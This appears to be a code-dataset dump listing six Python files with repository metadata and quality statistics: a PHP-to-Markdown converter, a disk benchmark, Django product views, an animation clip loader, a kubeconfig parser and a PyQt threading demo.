hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ddaaf774a1abba687897e41a33028b028a3ed7fd
| 2,200
|
py
|
Python
|
convertgf.py
|
Wivik/gundam-france
|
65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8
|
[
"MIT"
] | null | null | null |
convertgf.py
|
Wivik/gundam-france
|
65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8
|
[
"MIT"
] | null | null | null |
convertgf.py
|
Wivik/gundam-france
|
65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from markdownify import markdownify as md
import argparse
import re
import os
import sys
parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='file to convert')
args = parser.parse_args()
input_file = args.input_file
print(input_file)
if not re.search('.dist.php', input_file):
test_file = re.sub('\.php', '.dist.php', input_file)
print(test_file)
try:
os.stat(test_file)
print('file dist exists, ignoring')
sys.exit(0)
except:
os.rename(input_file, test_file)
print('file renamed, rerun job')
sys.exit(0)
output_file = os.path.splitext(input_file)[0]
output_file = os.path.splitext(output_file)[0]
output_file = output_file + '.md'
print(output_file)
# sys.exit(0)
with open(input_file, 'r') as file:
content = file.read()
html = md(content)
firstline = html.split('\n', 1)[0]
if re.search('php include', firstline):
print('ignore file')
# os.remove(input_file)
sys.exit(0)
# print(firstline)
## fix images path
html = html.replace('](images/', '](/images/')
# html = re.sub("{lien:db:(\d+):", "", html)
# html = re.sub("(html:lien})", "", html)
html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\s)", " \\4 ", html)
html = re.sub("(’)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", "'\\4 ", html)
html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", " \\4,", html)
# html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", " \\4,", html)
# html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\s)", " \\4,", html)
# html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\.)", " \\4.", html)
html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\.)", " \\4.", html)
html = re.sub("(<\?php echo \$_SERVER\[\'REQUEST_URI\'\]; \?>)", "", html)
html = re.sub("(php include\(\"modules/flag\\_spoiler\.php\"\); \?)", "", html)
# print(html)
result = '---\ntitle: "'+ firstline + '"\n---\n\n' + html
# print(output)
with (open(output_file, 'w')) as output:
output.write(result)
output.close()
file.close()
| 32.352941
| 86
| 0.537727
| 294
| 2,200
| 3.935374
| 0.268707
| 0.051858
| 0.085566
| 0.11236
| 0.267934
| 0.251513
| 0.208297
| 0.191011
| 0.191011
| 0.191011
| 0
| 0.008924
| 0.185
| 2,200
| 67
| 87
| 32.835821
| 0.636364
| 0.199545
| 0
| 0.068182
| 0
| 0
| 0.255441
| 0.124857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.113636
| 0
| 0.113636
| 0.136364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddab10387c063d1c5dd03502020dc60340b9c9c1
| 1,957
|
py
|
Python
|
scripts/disktest.py
|
CloudAdvocacy/ObjectDetection
|
ba823455a43684dea8f0bc1eab6f669a818895bb
|
[
"MIT"
] | null | null | null |
scripts/disktest.py
|
CloudAdvocacy/ObjectDetection
|
ba823455a43684dea8f0bc1eab6f669a818895bb
|
[
"MIT"
] | null | null | null |
scripts/disktest.py
|
CloudAdvocacy/ObjectDetection
|
ba823455a43684dea8f0bc1eab6f669a818895bb
|
[
"MIT"
] | null | null | null |
import io, os
import argparse
from timeit import default_timer as timer
parser = argparse.ArgumentParser(description="File Performance Testing Util")
parser.add_argument("command",help="Test to perform",choices=['read','write','readany'])
parser.add_argument("dir",help="Directory to use")
args = parser.parse_args()
def time(msg,size,f):
print(msg,end='...')
st = timer()
f()
el = timer()-st
print("{} sec, {} Mb/sec".format(el,size/el/1024/1024))
def write_test(n,size):
fn = "test_{}".format(size)+"_{}"
buf = os.urandom(size)
for i in range(n):
with open(os.path.join(args.dir,fn.format(i)),'wb') as f:
f.write(buf)
def read_test(n,size):
fn = "test_{}".format(size)+"_{}"
for i in range(n):
with open(os.path.join(args.dir,fn.format(i)),'rb') as f:
buf = bytearray(f.read())
def read_test(n=1000):
sz = 0
i = 0
st = timer()
for x in os.listdir(args.dir):
with open(os.path.join(args.dir,x),'rb') as f:
buf = bytearray(f.read())
sz += len(buf)
i += 1
n-=1
if n==0:
break
en = timer()-st
print("{} secs, {} Mb/Sec, av file size: {} Mb".format(en,sz/1024/1024/en,sz/i/1024/1024))
if args.command == "read":
time("1000 1k files",1024*1000,lambda: read_test(1000,1024))
time("100 1M files",1024*1024*100,lambda: read_test(100,1024*1024))
time("10 10M files",10*1024*1024*10,lambda: read_test(10,1024*1024*10))
time("1 100M files",1*1024*1024*100,lambda: read_test(1,1024*1024*100))
elif args.command == "write":
time("1000 1k files",1024*1000,lambda: write_test(1000,1024))
time("100 1M files",1024*1024*100,lambda: write_test(100,1024*1024))
time("10 10M files",10*1024*1024*10,lambda: write_test(10,1024*1024*10))
time("1 100M files",1*1024*1024*100,lambda: write_test(1,1024*1024*100))
elif args.command == "readany":
read_test()
| 33.169492
| 94
| 0.616249
| 320
| 1,957
| 3.70625
| 0.253125
| 0.10118
| 0.055649
| 0.057336
| 0.530354
| 0.530354
| 0.515177
| 0.369309
| 0.317032
| 0.317032
| 0
| 0.152132
| 0.197241
| 1,957
| 59
| 95
| 33.169492
| 0.602801
| 0
| 0
| 0.16
| 0
| 0
| 0.145557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.06
| 0
| 0.14
| 0.06
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddaf61fd3b67b0ad82d3ff5a5a750292ac61bd57
| 2,728
|
py
|
Python
|
products/views.py
|
deepindo/DoPython
|
d80b85b3b24566de6ece9f452564e4827e705959
|
[
"MIT"
] | 4
|
2022-01-04T09:56:19.000Z
|
2022-01-20T12:14:16.000Z
|
products/views.py
|
deepindo/DoPython
|
d80b85b3b24566de6ece9f452564e4827e705959
|
[
"MIT"
] | null | null | null |
products/views.py
|
deepindo/DoPython
|
d80b85b3b24566de6ece9f452564e4827e705959
|
[
"MIT"
] | 1
|
2022-01-20T09:40:16.000Z
|
2022-01-20T09:40:16.000Z
|
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from products.models import Product
def productList(request, productName):
"""产品的列表页"""
submenu = productName
if productName == 'robot':
productName = '家用机器人'
elif productName == 'monitor':
productName = '智能门锁'
else:
productName = '人脸识别解决方案'
product_list = Product.objects.filter(product_type=productName).order_by('-publish_date')
# 分页处理
# 每页显示2条数据
p = Paginator(product_list, 2)
if p.num_pages <= 1:
page_data = ''
else:
# 得到当前页,默认为1
page = int(request.GET.get('page', 1))
# 对页数进行分页
product_list = p.page(page)
left = []
right = []
left_has_more = False
right_has_more = False
first = False
last = False
total_pages = p.num_pages # 总页数
page_range = p.page_range # 页数迭代
if page == 1:
right = page_range[page:page + 2]
print(total_pages)
if right[-1] < total_pages - 1:
right_has_more = True
if right[-1] < total_pages:
last = True
elif page == total_pages:
left = page_range[(page - 3) if (page - 3) > 0 else 0:page - 1]
if left[0] > 2:
left_has_more = True
if left[0] > 1:
first = True
else:
left = page_range[(page - 3) if (page - 3) > 0 else 0:page - 1]
right = page_range[page:page + 2]
if left[0] > 2:
left_has_more = True
if left[0] > 1:
first = True
if right[-1] < total_pages - 1:
right_has_more = True
if right[-1] < total_pages:
last = True
page_data = {
'left': left,
'right': right,
'left_has_more': left_has_more,
'right_has_more': right_has_more,
'first': first,
'last': last,
'total_pages': total_pages,
'page': page,
}
context = {
'active_menu': 'products',
'sub_menu': submenu,
'productName': productName,
'productList': product_list,
'pageData': page_data
}
return render(request, 'products/productList.html', context)
def productDetail(request, id):
"""产品的详情页"""
product = get_object_or_404(Product, id=id) # 按id进行查找,没有时返回404
product.product_views += 1 # 浏览数加1
product.save()
return render(request, 'products/productDetail.html', {
'active_menu': 'products',
'product': product,
})
| 29.978022
| 93
| 0.535924
| 304
| 2,728
| 4.621711
| 0.266447
| 0.049822
| 0.039146
| 0.037011
| 0.253381
| 0.231317
| 0.231317
| 0.231317
| 0.195018
| 0.195018
| 0
| 0.024446
| 0.355205
| 2,728
| 91
| 94
| 29.978022
| 0.774304
| 0.028959
| 0
| 0.328947
| 0
| 0
| 0.091565
| 0.019757
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0
| 0.039474
| 0
| 0.092105
| 0.013158
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddb0240924a8101cddcbf80261a52d4f5843c4bf
| 1,545
|
py
|
Python
|
misc/CharacterMotion.py
|
qwewqa/dl-datamine
|
a8e050731f67e4cf49123947eadf66ac0fd948ca
|
[
"MIT"
] | 2
|
2020-03-31T00:07:54.000Z
|
2020-04-01T23:39:23.000Z
|
misc/CharacterMotion.py
|
qwewqa/dl-datamine
|
a8e050731f67e4cf49123947eadf66ac0fd948ca
|
[
"MIT"
] | null | null | null |
misc/CharacterMotion.py
|
qwewqa/dl-datamine
|
a8e050731f67e4cf49123947eadf66ac0fd948ca
|
[
"MIT"
] | 1
|
2021-08-02T04:21:31.000Z
|
2021-08-02T04:21:31.000Z
|
import json
import os
from dataclasses import dataclass, field
from typing import Dict, Optional
@dataclass
class AnimationClipData:
name: str
startTime: float
stopTime: float
id: Optional[int] = field(init=False)
duration: float = field(init=False)
def __post_init__(self):
self.duration = self.stopTime - self.startTime
try:
self.id = int(self.name.split('_')[-1])
except (IndexError, ValueError):
self.id = None
def load_animation_clip_data(in_path: str) -> Optional[AnimationClipData]:
with open(in_path) as f:
data = json.load(f)
return AnimationClipData(
name=data['name'],
startTime=data['m_MuscleClip']['m_StartTime'],
stopTime=data['m_MuscleClip']['m_StopTime']
)
def get_animation_clip_data(in_dir: str) -> Dict[str, AnimationClipData]:
clips = {}
for root, _, files in os.walk(in_dir):
for file_name in files:
file_path = os.path.join(root, file_name)
try:
clip = load_animation_clip_data(file_path)
clips[clip.name] = clip
except (KeyError, TypeError):
pass
return clips
def get_animation_clip_data_by_id(in_dir: str) -> Dict[Optional[int], Dict[str, AnimationClipData]]:
clips = {}
data = get_animation_clip_data(in_dir)
for clip in data.values():
if clip.id not in clips:
clips[clip.id] = {}
clips[clip.id][clip.name] = clip
return clips
| 28.611111
| 100
| 0.618123
| 192
| 1,545
| 4.776042
| 0.317708
| 0.070883
| 0.092694
| 0.062159
| 0.082879
| 0.054526
| 0
| 0
| 0
| 0
| 0
| 0.000893
| 0.275081
| 1,545
| 53
| 101
| 29.150943
| 0.817857
| 0
| 0
| 0.136364
| 0
| 0
| 0.032362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.022727
| 0.090909
| 0
| 0.386364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddb050b82209d0997ed09ca448c8c2752e16f7c5
| 14,431
|
py
|
Python
|
kube/config.py
|
nearmap/kubefs
|
e2f6c019f04e436d031874e40c59ba0ee61d8c58
|
[
"MIT"
] | 3
|
2021-05-31T06:45:37.000Z
|
2021-10-05T22:36:37.000Z
|
kube/config.py
|
nearmap/kubefs
|
e2f6c019f04e436d031874e40c59ba0ee61d8c58
|
[
"MIT"
] | 8
|
2021-09-06T00:43:13.000Z
|
2021-10-01T00:22:53.000Z
|
kube/config.py
|
nearmap/kubefs
|
e2f6c019f04e436d031874e40c59ba0ee61d8c58
|
[
"MIT"
] | null | null | null |
import base64
import fnmatch
import logging
import os
import tempfile
from ssl import SSLContext, create_default_context
from typing import Dict, List, Optional, Sequence
import yaml
from kube.tools.repr import disp_secret_blob, disp_secret_string
class ExecCmd:
def __init__(self, *, command: str, args: List[str], env: Dict[str, str]) -> None:
self.command = command
self.args = args
self.env = env
def __repr__(self) -> str:
return "<%s command=%r, args=%r, env=%r>" % (
self.__class__.__name__,
self.command,
self.args,
self.env,
)
class User:
def __init__(
self,
*,
name: str,
username: Optional[str],
password: Optional[str],
client_cert_path: Optional[str],
client_key_path: Optional[str],
client_cert_data: Optional[str],
client_key_data: Optional[str],
exec: Optional[ExecCmd],
) -> None:
self.name = name
self.username = username
self.password = password
self.client_cert_path = client_cert_path
self.client_key_path = client_key_path
self.client_cert_data = client_cert_data
self.client_key_data = client_key_data
self.exec = exec
# host.company.com -> host
self.short_name = name.split(".")[0]
def __repr__(self) -> str:
return (
"<%s name=%r, username=%r, password=%s, "
"client_cert_path=%r, client_key_path=%r, "
"client_cert_data=%s, client_key_data=%s, "
"exec=%r>"
) % (
self.__class__.__name__,
self.name,
self.username,
disp_secret_string(self.password),
self.client_cert_path,
self.client_key_path,
disp_secret_blob(self.client_cert_data),
disp_secret_blob(self.client_key_data),
self.exec,
)
def get_attribute_names(self) -> List[str]:
"Returns names of all attributes that are set"
names = []
attnames = dir(self)
for attname in attnames:
value = getattr(self, attname)
if attname.startswith("_") or callable(value):
continue
if not value:
continue
names.append(attname)
return names
class Cluster:
def __init__(
self,
*,
name: str,
server: str,
ca_cert_path: Optional[str],
ca_cert_data: Optional[str],
) -> None:
self.name = name
self.server = server
self.ca_cert_path = ca_cert_path
self.ca_cert_data = ca_cert_data
# host.company.com -> host
self.short_name = name.split(".")[0]
def __repr__(self) -> str:
return "<%s name=%r, server=%r, ca_cert_path=%r, ca_cert_data=%r>" % (
self.__class__.__name__,
self.name,
self.server,
self.ca_cert_path,
disp_secret_blob(self.ca_cert_data),
)
class Context:
def __init__(
self,
*,
name: str,
user: User,
cluster: Cluster,
namespace: Optional[str],
) -> None:
self.name = name
self.user = user
self.cluster = cluster
self.namespace = namespace
self.file: "KubeConfigFile" = None # type: ignore
# host.company.com -> host
self.short_name = name.split(".")[0]
def __repr__(self) -> str:
return "<%s name=%r, short_name=%r, user=%r, cluster=%r, namespace=%r>" % (
self.__class__.__name__,
self.name,
self.short_name,
self.user,
self.cluster,
self.namespace,
)
def set_file(self, file: "KubeConfigFile") -> None:
self.file = file
def create_ssl_context(self) -> SSLContext:
kwargs = {}
if self.cluster.ca_cert_path:
kwargs["cafile"] = self.cluster.ca_cert_path
elif self.cluster.ca_cert_data:
value = base64.b64decode(self.cluster.ca_cert_data)
cert_data = value.decode()
kwargs["cadata"] = cert_data
ssl_context = create_default_context(**kwargs)
# If the cert and key are in the form of blobs then we need to create
# temporary files for them because the ssl lib only accepts file paths.
# We first create a tempdir which is rwx only for the current user, so
# no other users can even list its contents. We then create the two temp
# files inside it. The tempdir and its contents get removed when the
# context manager exits.
if self.user.client_cert_data and self.user.client_key_data:
with tempfile.TemporaryDirectory(prefix="kube-client.") as tempdir_name:
cert_content = base64.b64decode(self.user.client_cert_data)
cert_file_fd, cert_file_name = tempfile.mkstemp(dir=tempdir_name)
os.write(cert_file_fd, cert_content)
cert_content = base64.b64decode(self.user.client_key_data)
key_file_fd, key_file_name = tempfile.mkstemp(dir=tempdir_name)
os.write(key_file_fd, cert_content)
ssl_context.load_cert_chain(
certfile=cert_file_name,
keyfile=key_file_name,
)
elif self.user.client_cert_path and self.user.client_key_path:
ssl_context.load_cert_chain(
certfile=self.user.client_cert_path,
keyfile=self.user.client_key_path,
)
return ssl_context
class KubeConfigFile:
def __init__(
self,
*,
filepath: str,
contexts: Sequence[Context],
users: Sequence[User],
clusters: Sequence[Cluster],
ctime: float,
mtime: float,
atime: float,
) -> None:
self.filepath = filepath
self.contexts = contexts or []
self.users = users or []
self.clusters = clusters or []
self.ctime = ctime
self.mtime = mtime
self.atime = atime
def __repr__(self) -> str:
return "<%s filepath=%r, contexts=%r, users=%r, clusters=%r>" % (
self.__class__.__name__,
self.filepath,
self.contexts,
self.users,
self.clusters,
)
class KubeConfigCollection:
def __init__(self) -> None:
self.clusters: Dict[str, Cluster] = {}
self.contexts: Dict[str, Context] = {}
self.users: Dict[str, User] = {}
def add_file(self, config_file: KubeConfigFile) -> None:
# NOTE: does not enforce uniqueness of context/user/cluster names
for cluster in config_file.clusters:
self.clusters[cluster.name] = cluster
for context in config_file.contexts:
self.contexts[context.name] = context
for user in config_file.users:
self.users[user.name] = user
def get_context_names(self) -> Sequence[str]:
names = list(self.contexts.keys())
names.sort()
return names
def get_context(self, name) -> Optional[Context]:
return self.contexts.get(name)
class KubeConfigSelector:
def __init__(self, *, collection: KubeConfigCollection) -> None:
self.collection = collection
def fnmatch_context(self, pattern: str) -> List[Context]:
names = self.collection.get_context_names()
names = fnmatch.filter(names, pattern)
objs = [self.collection.get_context(name) for name in names]
contexts = [ctx for ctx in objs if ctx]
return contexts
class KubeConfigLoader:
def __init__(
self, *, config_dir="$HOME/.kube", config_var="KUBECONFIG", logger=None
) -> None:
self.config_dir = config_dir
self.config_var = config_var
self.logger = logger or logging.getLogger("config-loader")
def get_candidate_files(self) -> Sequence[str]:
# use config_var if set
env_var = os.getenv(self.config_var)
if env_var:
filepaths = env_var.split(":")
filepaths = [fp.strip() for fp in filepaths if fp.strip()]
return filepaths
# fall back on config_dir
path = os.path.expandvars(self.config_dir)
filenames = os.listdir(path)
filepaths = []
for fn in filenames:
fp = os.path.join(path, fn)
if not os.path.isfile(fp):
continue
filepaths.append(fp)
return filepaths
def take_after_last_slash(self, name: str) -> str:
# arn:aws:iam::123:role/myrole -> myrole
if "/" in name:
name = name.rsplit("/")[1]
return name
def parse_context(
self, clusters: Sequence[Cluster], users: Sequence[User], dct
) -> Optional[Context]:
name = dct.get("name")
name = self.take_after_last_slash(name)
obj = dct.get("context")
cluster_id = obj.get("cluster")
namespace = obj.get("namespace")
user_id = obj.get("user")
cluster_id = self.take_after_last_slash(cluster_id)
user_id = self.take_after_last_slash(user_id)
# 'name', 'cluster' and 'user' are required attributes
if all((name, cluster_id, user_id)):
users = [user for user in users if user.name == user_id]
if not users:
self.logger.warn(
"When parsing context %r could not find matching user %r",
name,
user_id,
)
clusters = [cluster for cluster in clusters if cluster.name == cluster_id]
if not clusters:
self.logger.warn(
"When parsing context %r could not find matching cluster %r",
name,
cluster_id,
)
if users and clusters:
return Context(
name=name,
user=users[0],
cluster=clusters[0],
namespace=namespace,
)
return None
def parse_cluster(self, dct) -> Optional[Cluster]:
name = dct.get("name")
name = self.take_after_last_slash(name)
obj = dct.get("cluster")
server = obj.get("server")
ca_cert_path = obj.get("certificate-authority")
ca_cert_data = obj.get("certificate-authority-data")
# 'name' and 'server' are required attributes
if name and server:
return Cluster(
name=name,
server=server,
ca_cert_path=ca_cert_path,
ca_cert_data=ca_cert_data,
)
return None
def parse_user(self, dct) -> Optional[User]:
name = dct.get("name")
name = self.take_after_last_slash(name)
obj = dct.get("user")
password = obj.get("password")
username = obj.get("username")
client_cert_path = obj.get("client-certificate")
client_key_path = obj.get("client-key")
client_cert_data = obj.get("client-certificate-data")
client_key_data = obj.get("client-key-data")
exec_obj = obj.get("exec")
# 'name' is the only required attribute
if name:
exec = None
if exec_obj:
command = exec_obj.get("command")
args = exec_obj.get("args") or []
env_map = exec_obj.get("env") or {}
env = {}
for item_dct in env_map:
key = item_dct.get("name")
value = item_dct.get("value")
if key and value:
env[key] = value
exec = ExecCmd(command=command, args=args, env=env)
return User(
name=name,
username=username,
password=password,
client_cert_path=client_cert_path,
client_key_path=client_key_path,
client_cert_data=client_cert_data,
client_key_data=client_key_data,
exec=exec,
)
return None
def load_file(self, filepath: str) -> Optional[KubeConfigFile]:
with open(filepath, "rb") as fl:
try:
dct = yaml.load(fl, Loader=yaml.SafeLoader)
except Exception:
self.logger.warn("Failed to parse kube config as yaml: %s", filepath)
return None
kind = dct.get("kind")
if not kind == "Config":
self.logger.warn("Kube config does not have kind: Config: %s", filepath)
return None
clust_list = [self.parse_cluster(clus) for clus in dct.get("clusters") or []]
clusters = [cluster for cluster in clust_list if cluster]
user_list = [self.parse_user(user) for user in dct.get("users") or []]
users = [user for user in user_list if user]
ctx_list = [
self.parse_context(clusters, users, ctx)
for ctx in dct.get("contexts") or []
]
contexts = [ctx for ctx in ctx_list if ctx]
st = os.stat(filepath)
# The context is the organizing principle of a kube config so if we
# didn't find any we failed to parse the file
if contexts:
config_file = KubeConfigFile(
filepath=filepath,
contexts=contexts,
users=users,
clusters=clusters,
ctime=st.st_ctime,
mtime=st.st_mtime,
atime=st.st_atime,
)
for context in contexts:
context.set_file(config_file)
return config_file
return None
def create_collection(self) -> KubeConfigCollection:
collection = KubeConfigCollection()
for filepath in self.get_candidate_files():
config_file = self.load_file(filepath)
if config_file:
collection.add_file(config_file)
return collection
def get_selector() -> KubeConfigSelector:
loader = KubeConfigLoader()
collection = loader.create_collection()
selector = KubeConfigSelector(collection=collection)
return selector
| 30.901499
| 86
| 0.56538
| 1,671
| 14,431
| 4.661879
| 0.139437
| 0.025417
| 0.018357
| 0.013864
| 0.240308
| 0.161361
| 0.107317
| 0.071117
| 0.071117
| 0.05982
| 0
| 0.002412
| 0.339339
| 14,431
| 466
| 87
| 30.967811
| 0.814663
| 0.062019
| 0
| 0.189944
| 0
| 0.002793
| 0.066952
| 0.005161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078212
| false
| 0.01676
| 0.02514
| 0.01676
| 0.195531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddb11949c25d2f8ec4e231606475f6d7c71dff61
| 1,256
|
py
|
Python
|
other/application/windowApp/test6.py
|
Ethan7102/FYP
|
c6560a0b95ad78d5e1a341ab2d93c063e10c6631
|
[
"MIT"
] | null | null | null |
other/application/windowApp/test6.py
|
Ethan7102/FYP
|
c6560a0b95ad78d5e1a341ab2d93c063e10c6631
|
[
"MIT"
] | null | null | null |
other/application/windowApp/test6.py
|
Ethan7102/FYP
|
c6560a0b95ad78d5e1a341ab2d93c063e10c6631
|
[
"MIT"
] | 1
|
2021-01-23T07:59:57.000Z
|
2021-01-23T07:59:57.000Z
|
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject
from PyQt5.QtWidgets import QApplication, QDialog, QLineEdit
import time
import sys
class BackendThread(QObject):
# 通过类成员对象定义信号
update_date = pyqtSignal(str)
# 处理业务逻辑
def run(self):
while True:
data = QDateTime.currentDateTime()
currTime = data.toString("yyyy-MM-dd hh:mm:ss")
self.update_date.emit(str(currTime))
time.sleep(1)
class Window(QDialog):
def __init__(self):
QDialog.__init__(self)
self.setWindowTitle('PyQt 5界面实时更新例子')
self.resize(400, 100)
self.input = QLineEdit(self)
self.input.resize(400, 100)
self.initUI()
def initUI(self):
# 创建线程
self.backend = BackendThread()
# 连接信号
self.backend.update_date.connect(self.handleDisplay)
self.thread = QThread()
self.backend.moveToThread(self.thread)
# 开始线程
self.thread.started.connect(self.backend.run)
self.thread.start()
# 将当前时间输出到文本框
def handleDisplay(self, data):
self.input.setText(data)
if __name__ == '__main__':
app = QApplication(sys.argv)
win = Window()
win.show()
sys.exit(app.exec_())
| 25.632653
| 64
| 0.627389
| 140
| 1,256
| 5.485714
| 0.492857
| 0.057292
| 0.03125
| 0.041667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017279
| 0.262739
| 1,256
| 49
| 65
| 25.632653
| 0.812095
| 0.035828
| 0
| 0
| 0
| 0
| 0.034025
| 0
